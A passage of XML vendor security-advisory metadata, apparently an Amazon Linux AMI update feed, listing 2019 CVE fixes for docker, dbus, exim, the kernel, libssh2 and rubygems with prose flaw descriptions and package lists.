</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5743" title="" id="CVE-2018-5743" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-chroot" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1245</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1245: medium priority package update for docker</title><issued date="2019-07-17 23:53:00" /><updated date="2019-07-25 18:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-15664:
A flaw was discovered in the API endpoint behind the &#039;docker cp&#039; command. The endpoint is vulnerable to a Time Of Check to Time Of Use (TOCTOU) vulnerability in the way it handles symbolic links inside a container. An attacker who has compromised an existing container can cause arbitrary files on the host filesystem to be read/written when an administrator tries to copy a file from/to the container.
1714722:
CVE-2018-15664 docker: symlink-exchange race attacks in docker cp
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15664" title="" id="CVE-2018-15664" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="18.06.1ce" release="10.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-18.06.1ce-10.32.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="18.06.1ce" release="10.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-18.06.1ce-10.32.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1246</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1246: medium priority package update for dbus</title><issued date="2019-07-17 23:54:00" /><updated date="2019-07-25 18:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12749:
dbus before 1.10.28, 1.12.x before 1.12.16, and 1.13.x before 1.13.12, as used in DBusServer in Canonical Upstart in Ubuntu 14.04 (and in some, less common, uses of dbus-daemon), allows cookie spoofing because of symlink mishandling in the reference implementation of DBUS_COOKIE_SHA1 in the libdbus library. (This only affects the DBUS_COOKIE_SHA1 authentication mechanism.) A malicious client with write access to its own home directory could manipulate a ~/.dbus-keyrings symlink to cause a DBusServer with a different uid to read and write in unintended locations. In the worst case, this could result in the DBusServer reusing a cookie that is known to the malicious client, and treating that cookie as evidence that a subsequent client connection came from an attacker-chosen uid, allowing authentication bypass.
1719344:
CVE-2019-12749 dbus: DBusServer DBUS_COOKIE_SHA1 authentication bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12749" title="" id="CVE-2019-12749" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dbus-libs" version="1.6.12" release="14.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-libs-1.6.12-14.29.amzn1.x86_64.rpm</filename></package><package name="dbus-devel" version="1.6.12" release="14.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-devel-1.6.12-14.29.amzn1.x86_64.rpm</filename></package><package name="dbus-debuginfo" version="1.6.12" release="14.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-debuginfo-1.6.12-14.29.amzn1.x86_64.rpm</filename></package><package name="dbus" version="1.6.12" release="14.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-1.6.12-14.29.amzn1.x86_64.rpm</filename></package><package name="dbus-doc" version="1.6.12" release="14.29.amzn1" epoch="1" arch="noarch"><filename>Packages/dbus-doc-1.6.12-14.29.amzn1.noarch.rpm</filename></package><package name="dbus-devel" version="1.6.12" release="14.29.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-devel-1.6.12-14.29.amzn1.i686.rpm</filename></package><package name="dbus-debuginfo" version="1.6.12" release="14.29.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-debuginfo-1.6.12-14.29.amzn1.i686.rpm</filename></package><package name="dbus-libs" version="1.6.12" release="14.29.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-libs-1.6.12-14.29.amzn1.i686.rpm</filename></package><package name="dbus" version="1.6.12" release="14.29.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-1.6.12-14.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1252</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1252: important priority package update for exim</title><issued date="2019-07-25 18:40:00" /><updated date="2019-07-25 18:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13917:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13917" title="" id="CVE-2019-13917" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mysql" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.23.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.23.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.23.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.23.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.23.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1253</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1253: medium priority package update for kernel</title><issued date="2019-08-05 17:40:00" /><updated date="2019-08-12 18:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1125:
A Spectre gadget was found in the Linux kernel&#039;s implementation of system interrupts. An attacker with local access could use this information to reveal private data through a Spectre like side channel.
1724389:
CVE-2019-1125 kernel: hw: Spectre SWAPGS gadget vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1125" title="" id="CVE-2019-1125" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.133-88.112.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1254</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1254: important priority package update for libssh2</title><issued date="2019-08-12 18:05:00" /><updated date="2019-08-12 18:11:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3863:
A flaw was found in libssh2 before 1.8.1. A server could send a multiple keyboard interactive response messages whose total length are greater than unsigned char max characters. This value is used as an index to copy memory causing in an out of bounds memory write error.
1687313:
CVE-2019-3863 libssh2: Integer overflow in user authenticate keyboard interactive allows out-of-bounds writes
CVE-2019-3857:
An integer overflow flaw which could lead to an out of bounds write was discovered in libssh2 in the way SSH_MSG_CHANNEL_REQUEST packets with an exit signal are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.
1687305:
CVE-2019-3857 libssh2: Integer overflow in SSH packet processing channel resulting in out of bounds write
CVE-2019-3856:
An integer overflow flaw, which could lead to an out of bounds write, was discovered in libssh2 in the way keyboard prompt requests are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.
1687304:
CVE-2019-3856 libssh2: Integer overflow in keyboard interactive handling resulting in out of bounds write
CVE-2019-3855:
An integer overflow flaw which could lead to an out of bounds write was discovered in libssh2 in the way packets are read from the server. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.
1687303:
CVE-2019-3855 libssh2: Integer overflow in transport read resulting in out of bounds write
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3855" title="" id="CVE-2019-3855" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3856" title="" id="CVE-2019-3856" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3857" title="" id="CVE-2019-3857" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3863" title="" id="CVE-2019-3863" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libssh2-devel" version="1.4.2" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-devel-1.4.2-3.12.amzn1.x86_64.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-docs-1.4.2-3.12.amzn1.x86_64.rpm</filename></package><package name="libssh2" version="1.4.2" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-1.4.2-3.12.amzn1.x86_64.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-debuginfo-1.4.2-3.12.amzn1.x86_64.rpm</filename></package><package name="libssh2" version="1.4.2" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-1.4.2-3.12.amzn1.i686.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-debuginfo-1.4.2-3.12.amzn1.i686.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-devel-1.4.2-3.12.amzn1.i686.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-docs-1.4.2-3.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1255</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1255: important priority package update for ruby20 ruby21 ruby24</title><issued date="2019-08-07 22:58:00" /><updated date="2019-08-12 18:13:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-8325:
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. (There are many ways to cause an error.)
1692522:
CVE-2019-8325 rubygems: Escape sequence injection vulnerability in errors
CVE-2019-8324:
An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted gem with a multi-line name is not handled correctly. Therefore, an attacker could inject arbitrary code to the stub line of gemspec, which is eval-ed by code in ensure_loadable_spec during the preinstall check.
1692520:
CVE-2019-8324 rubygems: Installing a malicious gem may lead to arbitrary code execution
CVE-2019-8323:
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Gem::GemcutterUtilities#with_response may output the API response to stdout as it is. Therefore, if the API side modifies the response, escape sequence injection may occur.
1692519:
CVE-2019-8323 rubygems: Escape sequence injection vulnerability in API response handling
CVE-2019-8322:
An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur.
1692516:
CVE-2019-8322 rubygems: Escape sequence injection vulnerability in gem owner
CVE-2019-8321:
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::UserInteraction#verbose calls say without escaping, escape sequence injection is possible.
1692514:
CVE-2019-8321 rubygems: Escape sequence injection vulnerability in verbose
CVE-2019-8320:
A Directory Traversal issue was discovered in RubyGems 2.7.6 and later through 3.0.2. Before making new directories or touching files (which now include path-checking code for symlinks), it would delete the target destination. If that destination was hidden behind a symlink, a malicious gem could delete arbitrary files on the user&#039;s machine, presuming the attacker could guess at paths. Given how frequently gem is run as sudo, and how predictable paths are on modern systems (/tmp, /usr, etc.), this could likely lead to data loss or an unusable system.
1692512:
CVE-2019-8320 rubygems: Delete directory using symlink when decompressing tar
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8320" title="" id="CVE-2019-8320" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8321" title="" id="CVE-2019-8321" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8322" title="" id="CVE-2019-8322" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8323" title="" id="CVE-2019-8323" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8324" title="" id="CVE-2019-8324" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8325" title="" id="CVE-2019-8325" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20-irb" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-1.32.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-1.32.amzn1.noarch.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-1.32.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-1.32.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.32.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.32.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.32.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-1.32.amzn1.x86_64.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.32.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-1.32.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-1.32.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-1.32.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.32.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.32.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-1.32.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.32.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.32.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-1.32.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.22.amzn1.x86_64.rpm</filename></package><package name="ruby21-devel" version="2.1.9" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.9-1.22.amzn1.x86_64.rpm</filename></package><package name="ruby21-irb" version="2.1.9" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.9-1.22.amzn1.noarch.rpm</filename></package><package name="ruby21-libs" version="2.1.9" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.9-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygems21-devel" version="2.2.5" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.5-1.22.amzn1.noarch.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.9" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.9-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.22.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.9" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.9-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.3-1.22.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.9" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.9-1.22.amzn1.noarch.rpm</filename></package><package name="rubygems21" version="2.2.5" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.5-1.22.amzn1.noarch.rpm</filename></package><package name="ruby21" version="2.1.9" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.9-1.22.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.22.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.9" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.9-1.22.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.3-1.22.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.9" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.9-1.22.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.22.amzn1.i686.rpm</filename></package><package name="ruby21-libs" version="2.1.9" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.9-1.22.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygems24" version="2.6.14.3" release="1.30.11.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.3-1.30.11.amzn1.noarch.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="1.30.11.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-1.30.11.amzn1.noarch.rpm</filename></package><package name="ruby24-devel" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.5-1.30.11.amzn1.x86_64.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.5-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-1.30.11.amzn1.x86_64.rpm</filename></package><package name="ruby24" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.5-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.3" release="1.30.11.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.3-1.30.11.amzn1.noarch.rpm</filename></package><package name="ruby24-libs" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.5-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-1.30.11.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.5-1.30.11.amzn1.noarch.rpm</filename></package><package name="ruby24-irb" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.5-1.30.11.amzn1.noarch.rpm</filename></package><package name="ruby24" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.5-1.30.11.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-1.30.11.amzn1.i686.rpm</filename></package><package 